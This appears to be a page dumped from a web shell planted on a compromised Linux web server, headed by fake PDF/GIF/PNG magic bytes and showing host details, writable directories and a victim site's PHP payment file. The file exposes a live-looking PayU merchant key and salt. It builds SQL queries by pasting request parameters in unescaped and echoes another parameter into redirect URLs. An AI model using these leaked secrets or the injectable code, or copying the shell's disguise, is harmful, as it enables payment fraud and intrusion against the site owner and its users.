%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/pay-20221229211232/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/pay-20221229211232/index.php
<?php
include "../admin/conn.php";
$query="select username,amount from payments where username='".$_REQUEST['username']."' ORDER BY id DESC limit 1";
$result=mysqli_query($c,$query);
while($row	=	mysqli_fetch_array($result))
{
$username=$row['username'];
$amount=$row['amount'];
}
$query="select * from centres where username='".$_REQUEST['username']."'";
$result=mysqli_query($c,$query);
while($row	=	mysqli_fetch_array($result))
{
$username=$row['username'];
$email=$row['email'];
$name=$row['name'];
}

$MERCHANT_KEY = "xBXYsHvS"; //merchant key provided by payumoney
$SALT = "FRBJBEjMx7"; //salt provided by payumoney
$PAYU_BASE_URL = "https://secure.payu.in";
$action = '';
$posted = array();
if(!empty($_POST)) {
//print_r($_POST);
foreach($_POST as $key => $value) {
$posted[$key] = $value; 
}
}
if(empty($posted['txnid'])) {
$txnid = substr(hash('sha256', mt_rand() . microtime()), 0, 20);
} else {
$txnid = $posted['txnid'];
}
$hash = '';
$hashSequence = "key|txnid|amount|productinfo|firstname|email|udf1|udf2|udf3|udf4|udf5|udf6|udf7|udf8|udf9|udf10";
if(empty($posted['hash']) && sizeof($posted) > 0) {
 $hashVarsSeq = explode('|', $hashSequence);
$hash_string = '';	
	foreach($hashVarsSeq as $hash_var) {
$hash_string .= isset($posted[$hash_var]) ? $posted[$hash_var] : '';
$hash_string .= '|';
}
$hash_string .= $SALT;
$hash = strtolower(hash('sha512', $hash_string));
$action = $PAYU_BASE_URL . '/_payment';
} elseif(!empty($posted['hash'])) {
$hash = $posted['hash'];
$action = $PAYU_BASE_URL . '/_payment';
}
?>
<html>
<body>
<form action="<?php echo $action; ?>" method="post" name="payuForm">
<input type="hidden" name="key" value="<?php echo $MERCHANT_KEY ?>" />
<input type="hidden" name="hash" value="<?php echo $hash ?>"/>
<input type="hidden" name="txnid" value="<?php echo $txnid ?>" />
<input type="hidden" name="amount" value="<?php echo $amount;?>" />
<input type="hidden" name="firstname" value="<?php echo $name;?>" />
<input type="hidden" name="email" value="<?php echo $email;?>" />
<input type="hidden" name="phone" value="<?php echo $username;?>" />
<input type="hidden" name="productinfo" value="recharge" />
<input type="hidden" name="surl" value="https://www.addictionfreeindia.in/pay/success.php?orderid=<?php echo $_REQUEST['orderid'];?>" />
<input type="hidden" name="furl" value="https://www.addictionfreeindia.in/pay/cancel.php?orderid=<?php echo $_REQUEST['orderid'];?>" />
<input type="hidden" name="service_provider" value="payu_paisa" />
</form>
</body>
</html>
<script>
var hash = '<?php echo $hash ?>';
if(hash == '') {
return;
}
var payuForm = document.forms.payuForm;
payuForm.submit();
</script>
<script type="text/javascript">document.payuForm.submit();</script>

VaKeR 2022